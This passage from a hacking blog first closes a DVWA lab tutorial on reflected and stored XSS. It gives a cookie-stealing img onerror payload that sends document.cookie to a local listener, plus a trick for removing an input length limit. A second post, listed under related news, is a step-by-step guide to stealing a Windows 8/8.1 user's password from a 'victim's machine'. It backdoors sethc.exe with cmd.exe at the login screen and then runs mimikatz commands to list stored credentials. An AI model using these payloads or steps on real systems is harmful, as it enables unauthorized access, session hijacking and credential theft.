Another type of XSS attack is called Reflected XSS Attack. OWASP describes Reflected XSS as those attacks "where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request."To perform this type of attack, click on XSS (Reflected) navigation link in DVWA. After you open the web page you are presented with an input field that asks you to input your name.
<script>alert("XSS")</script>
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Referencing OWASP again, it is mentioned that "Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS."
Obviously you'll need your super awesome social engineering skills to successfully execute this type of attack. But yeah we are good guys why would we do so?
Stored XSS:
The last type of XSS attack that we are going to see is Stored XSS Attack. OWASP describes Stored XSS attacks as those attacks "where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS."To perform this type of XSS attack, click on XSS (Stored) navigation link in DVWA. As the page loads, we see a Guestbook Signing form.
<script>alert(XSS)</script>
Now when you try to write your cookie stealing payload you notice you cannot put your payload in the box as the maximum input length for the textarea is set to 50. To get rid of this restriction, right-click on the textarea box and click inspect. Change or delete the maxlength="50" attribute in code:
<textarea name="mtxMessage" cols="50" rows="3" maxlength="50"></textarea>
<textarea name="mtxMessage" cols="50" rows="3"></textarea>
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
This is it for today see you next time.
References:
- DOM-based vulnerabilities: https://portswigger.net/web-security/dom-based
- DOM-based XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
- Document Object Model: https://en.wikipedia.org/wiki/Document_Object_Model
- Payload All the Things: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
- Cross Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/
Related news
Cracking Windows 8/8.1 Passwords With Mimikatz
You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...
Requirements:
- A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
- Mimikatz (Download | Blog)
- Physical Access to victim's machine
- A Working Brain in that Big Head (Download Here)
Steps:
1. First of all download mimikatz and put it in a pendrive.2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window
3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:
mkdir /media/win
ntfs-3g /dev/sda1 /media/win
[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.
4. Now navigate to the System32 folder using the following command
cd /media/win/Windows/System32
5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:
mv sethc.exe sethc.exe.bak
sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.
6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:
cp cmd.exe sethc.exe
[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality
7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.
8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this
9. Now navigate to your usb drive in my case its drive G:
10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)
11. Run mimikatz and type the following commands one after the other in sequence:
privilege::debug
token::elevate
vault::list
the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)
That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...
Hope you enjoyed the tutorial have fun :)
Assinar:
Postagens (Atom)
Postagens
